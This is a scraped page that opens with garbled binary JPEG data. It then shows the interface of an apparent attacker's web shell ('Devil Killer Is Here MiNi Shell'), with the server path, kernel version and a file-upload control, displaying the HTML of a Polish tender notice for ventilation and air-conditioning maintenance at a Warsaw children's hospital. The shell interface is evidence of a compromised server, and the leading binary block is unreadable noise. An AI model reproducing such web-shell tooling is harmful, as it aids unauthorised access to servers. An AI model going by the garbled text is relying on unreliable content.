JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230616/0026334901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja instalacji i urządzeń wentylacji mechanicznej <br/>oraz klimatyzacji w budynkach Szpitala. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Dziecięcy im. prof. dr. med. Jana Bogdanowicza SPZOZ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Szpital Dziecięcy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000297359</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niekłańska 4/24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-924</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@nieklanska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nieklanska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja instalacji i urządzeń wentylacji mechanicznej <br/>oraz klimatyzacji w budynkach Szpitala. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-386af2fc-0b56-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00263349</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00074954/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Serwis klimatyzacji i wentylacji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nieklanska.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://nieklanska.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy<br/>Zamawiającyma Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej. Wszelką korespondencję do<br/>Zamawiającego związaną z niniejszym postępowaniem należy przekazywać za pomocą Platformy MarketPlanet.<br/>2) Zamawiający nie bierze odpowiedzialności za skutki braku zachowania przez Wykonawcę powyższego wymogu. Zamawiający nie<br/>przewiduje innego sposobu komunikowania się z Wykonawcami niż przy użyciu środków komunikacji elektronicznej, o których mowa<br/>w ust. 7 powyżej. Zamawiający nie bierze odpowiedzialności za brak dostarczenia na maila Wykonawcy informacji z platformy.<br/>Zamawiający informuje, iż wszystkie dokumenty postępowania oraz wszelka korespondencja znajdują się na Platformie<br/>MarketPlanet. Po stronie Wykonawcy jest systematyczne sprawdzanie informacji bezpośrednio na Platformie.<br/>3) Oferta składana w formie lub postaci elektronicznej musi być opatrzona przez kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym. Oferty w formie lub postaci elektronicznej należy składać za pomocą Platformy<br/>(zakładka „Oferty”). W przypadku używania kwalifikowanego podpisu Zamawiający rekomenduje aby Wykonawcy stosowali znacznik<br/>czasu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o Ochronie Danych (RODO)<br/>informujemy, że:<br/>1) Administratorem Państwa danych osobowych jest Szpital Dziecięcy im. prof. dr. med. J. Bogdanowicza w Warszawie, adres: ul.<br/>Niekłańska 4/24, 03-924 Warszawa;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogę się kontaktować w sprawach przetwarzania moich danych<br/>osobowych za pośrednictwem poczty elektronicznej: iod@nieklanska.pl;<br/>3) Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego na podstawie art. 275 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (dalej ustawa Pzp) - w odniesieniu do postępowań poniżej progów unijnych oraz na podstawie art. 129 ww. ustawy w<br/>odniesieniu do postępowań powyżej progów unijnych;<br/>4) Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów prawa, a także podmiotom, z<br/>którymi administrator zawarł umowę w związku z realizacją usług na rzecz administratora (np. kancelarią prawną, dostawcą<br/>oprogramowania, zewnętrznym audytorem, zleceniobiorcą świadczącym usługę z zakresu ochrony danych osobowych). odbiorcami<br/>danych osobowych Wykonawcy będą również osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Pzp;<br/>5) Administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub organizacji międzynarodowej;<br/>6) Mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; w przypadku zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej)<br/>przez okres wskazany w wytycznych w zakresie kwalifikowalności wydatków;<br/>2) Przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia przetwarzania, a także prawo do<br/>wniesienia skargi do organu nadzorczego;<br/>3) Podanie danych osobowych jest dobrowolne, jednakże niezbędne do realizacji ww. celu. Konsekwencje niepodania danych<br/>określa ustawa Pzp;<br/>4) Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa dane osobowe.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">JAK W SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP-31/KJ/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia objętym niniejszym postępowaniem są „Konserwacja instalacji <br/>i urządzeń wentylacji mechanicznej i klimatyzacji w budynkach Szpitala” zgodnie z <br/>opisem przedmiotu zamówienia znajdującym się Załączniku nr 2 – Opis przedmiotu <br/>zamówienia stanowiącym integralną część SWZ.<br/>Informacje dotyczące przedmiotu zamówienia:<br/>a. Wykonywania przeglądów serwisowych okresowych urządzeń oraz elementów ich <br/>sterowania zgodnie ze szczegółowym zakresem czynności przeglądowych <br/>Nr postępowania RZP – 31/KJ/2023<br/>4<br/>określonym poniżej i częstotliwością określoną w Zał. Nr 2 do SWZ – Opis <br/>przedmiotu zamówienia.<br/>b. Zapewnienia 24-godzinnej usługi typu „Interwencja serwisowa”. <br/>c. Wykonywania napraw urządzeń. <br/>d. Dostawy części i materiałów eksploatacyjnych do urządzeń. <br/>e. Wykonawca zobowiązany jest wykonywanie napraw urządzeń, w tym w szczególności <br/>usuwania stwierdzonych podczas przeglądu, awarii, usuwanie usterek i <br/>nieprawidłowości związanych z funkcjonowaniem urządzeń, wymiany zużytych części <br/>i podzespołów. Ww. naprawy nie obejmują modernizacji urządzeń, wykonywania <br/>nowych instalacji oraz przeróbek istniejących instalacji.<br/>f. Naprawy urządzeń Wykonawca powinien wykonać w ciągu 24 godzin od chwili <br/>stwierdzenia konieczności naprawy, z zastrzeżeniem, że w przypadku konieczności <br/>zakupu komponentów urządzeń czas naprawy może zostać w sytuacji, gdy nie ma <br/>możliwości nabycia ww. komponentów na rynku. W przypadku przedłużenia naprawy <br/>ponad 24 godziny oraz gdy dotyczy ona pomieszczeń w których znajdują się urządzenia <br/>medyczne o znacznej wartości, dużej wrażliwości na reżim temperaturowy lub <br/>wentylacyjny, oraz krytycznym znaczeniu z punktu widzenia funkcjonowania <br/>Zamawiającego, Wykonawca zobowiązany jest przy pomocy środków zastępczych i <br/>tymczasowych zabezpieczyć właściwy komfort cieplno-wentylacyjny w <br/>pomieszczeniu, którego dotyczy awaria. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-08-01 do 2025-08-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób realizujących przedmiot zamówienia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">33</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji serwisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu oraz spełniają warunki udziału w postępowaniu, dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów: <br/>1. certyfikat dla przedsiębiorców wydany przez UDT zgodnie z wymaganiami ustawy <br/>z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o <br/>niektórych fluorowanych gazach cieplarnianych (Dz. U. z 2015 r. poz. 881) w <br/>zakresie instalowania oraz konserwacji lub serwisowania urządzeń chłodniczych, <br/>klimatyzacyjnych i pomp ciepła.<br/>c) sytuacji ekonomicznej lub finansowej;<br/> Wykonawca spełni warunek jeśli wykaże, że:<br/>1. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż <br/>1 000 000,00 zł (jeden milion złotych 00/100)<br/>d) zdolności technicznej lub zawodowej dotyczący doświadczenia: <br/>Wykonawca spełni warunek jeśli wykaże, że:<br/>1. w okresie ostatnich trzech lat przez upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy w tym okresie, należycie wykonał lub jest w <br/>trakcie wykonania co najmniej jednej usługi o wartości rocznej 180 000,00 zł brutto <br/>polegającej na wykonywaniu przeglądów okresowych instalacji oraz urządzeń <br/>wentylacji i klimatyzacji wraz z pełnieniem 24 godzinnej gotowości do podjęcia <br/>interwencji serwisowych, z określonym czasem reakcii nie dłuższym niż 4 godziny od <br/>chwili zgłoszenia - (usługa winna być wykonywana w ramach jednej umowy i trwać <br/>przez okres co najmniej 1 roku – 12 kolejnych miesięcy);<br/>2. dysponuje n/w osobami posiadającymi minimum roczne doświadczenie zawodowe<br/>w poniższych zakresach :<br/>Nr postępowania RZP – 31/KJ/2023<br/>8<br/>a) 1 osobę posiadającą uprawnienia budowlane do kierowania robotami <br/>budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, <br/>instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, <br/>wentylacyjnych i gazowych wraz z aktualnym na dzień podpisania umowy <br/>wpisem do odpowiedniej Izby<br/>b) 4 osoby posiadające certyfikat dla personelu zgodnie z wymaganiami ustawy z <br/>dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o <br/>niektórych fluorowanych gazach cieplarnianych (Dz. U. z 2015 r. poz. 881). <br/>c) 2 osoby posiadające jednocześnie świadectwa kwalifikacyjne, uprawniające do <br/>zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru, w <br/>zakresie:<br/>- urządzeń wentylacji, klimatyzacji i chłodniczych, o mocy powyżej 50 kW;<br/>- aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej <br/>regulacji; sterowania i zabezpieczeń urządzeń i instalacji,<br/>oraz:<br/>- urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kV <br/>- aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji; <br/>sterowania i zabezpieczeń urządzeń i instalacji,<br/>d) 4 osoby posiadające jednocześnie świadectwa kwalifikacyjne, uprawniające do <br/>zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji, w <br/>zakresie:<br/>- urządzeń wentylacji, klimatyzacji i chłodniczych, o mocy powyżej 50 kW;<br/>- aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji; <br/>sterowania i zabezpieczeń urządzeń i instalacji,<br/>oraz:<br/>- urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kV <br/>- aparatury kontrolno-pomiarowej oraz urządzeń i instalacji automatycznej regulacji; <br/>sterowania i zabezpieczeń urządzeń i instalacji,<br/>3. Wykonawca spełni warunek poprzez złożenia oświadczenia zgodnego ze wzorem <br/>określonym w Załączniku Nr 8 do SIWZ wskazując minimum 1 osobę wykonującą <br/>przedmiot zamówienia, posiadającą niżej wymienione certyfikaty i uprawnienia: <br/>a) dokument (certyfikat, zaświadczenie) wystawiony przez producenta lub jego <br/>przedstawiciela w Polsce potwierdzający, że wskazana osoba może <br/>świadczyć usługę serwisową klimatyzatorów, co najmniej trzech z <br/>wymienionych poniżej producentów: <br/> - Daikin, - Fujitsu, -LG - Galanz, - Midea <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: Wykaz<br/>podmiotowych<br/>środków dowodowych na potwierdzenie niepodlegania wykluczeniu: a) informację z Krajowego<br/>Rejestru Karnego w zakresie określonym w art. 108 ust. 1 uPzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu<br/>składania ofert – otrzymany dokument w postaci papierowej musi zostać złożony w postaci dokumentu elektronicznego, opatrzonego<br/>podpisem kwalifikowanym lub zaufanym lub podpisem osobistym Wykonawcy. W przypadku składania informacji z Krajowego<br/>Rejestru Karnego otrzymanej przez Wykonawcę za pomocą systemu informatycznego e-KRK Wykonawca składa na Platformie<br/>wszystkie pliki jakie otrzymał z Krajowego Rejestru Karnego. Wykonawca nie podpisuje otrzymanego pliku;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Podmiotowe środki dowodowe dotyczące potwierdzenia spełniania warunków udziału w <br/>postępowaniu, składane na wezwanie Zamawiającego przez Wykonawcę, którego oferta <br/>została najwyżej oceniona (w terminie wyznaczonym przez Zamawiającego, nie krótszym <br/>niż 5 dni):<br/>a) wykaz wykonanych usług zgodnie z Załącznikiem nr 7 do SWZ;<br/>b) polisa potwierdzająca, że Wykonawca jest ubezpieczony od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na <br/>sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł;<br/>c) wykaz osób, którymi Wykonawca będzie dysponował w celu realizacji przedmiotu <br/>zamówienia wraz z podaniem informacji na temat posiadanych przez te osoby <br/>wymaganych Świadectw kwalifikacji, Certyfikatów i Uprawnień oraz zawierającym <br/>potwierdzenie minimum rocznego doświadczenia zawodowego zgodnie <br/>z Załącznikiem nr 8 do SWZ;<br/>d) Uprawnienia, świadectwa kwalifikacji, certyfikaty o których mowa w punkcie <br/>powyżej (KOPIE DOKUMENTÓW)<br/>e) certyfikat dla przedsiębiorców wydany przez UDT zgodnie z wymaganiami ustawy <br/>z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych <br/>Nr postępowania RZP – 31/KJ/2023<br/>11<br/>fluorowanych gazach cieplarnianych (Dz. U. z 2015 r. poz. 881) w zakresie instalowania <br/>oraz konserwacji lub serwisowania urządzeń chłodniczych, klimatyzacyjnych i pomp <br/>ciepła.<br/>f) aktualny certyfikat w zakresie obejmującym usługi związane z przedmiotem <br/>zamówienia, dla systemu zarządzania jakością spełniającego wymagania normy PNEN <br/>ISO 9001 lub normy równoważnej, odpowiadającej wymaganiom ISO 9001, <br/>wystawiony przez niezależną uprawnioną do certyfikowania systemów zarządzania <br/>jakością akredytowaną jednostkę certyfikującą lub aktualny dokument równoważny <br/>wystawiony przez uprawnioną do certyfikowania systemów zarządzania jakością <br/>akredytowaną jednostkę certyfikującą potwierdzający, że Wykonawca posiada i stosuje <br/>system zarządzana jakością spełniający wymagania ww. norm</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Wykaz osób, którymi Wykonawca będzie dysponował w celu realizacji przedmiotu <br/>zamówienia wraz z podaniem informacji dotyczących doświadczenia w realizacji <br/>określonych usług zgodnie z Załącznikiem nr 6 do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca jest zobowiązany złożyć aktualne oświadczenie, o którym mowa w art. 125 <br/>ust. 1 uPzp, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w <br/>postępowaniu, wg wzoru stanowiącego Załącznik nr 3 do SWZ.<br/>Nr postępowania RZP – 31/KJ/2023<br/>10<br/>a) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, składa każdy z tych Wykonawców, <br/>wg wzoru stanowiącego Załącznik nr 3 do SWZ. Oświadczenia te potwierdzają brak <br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w <br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Oświadczenie dotyczące Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, składane na podstawie art. 117 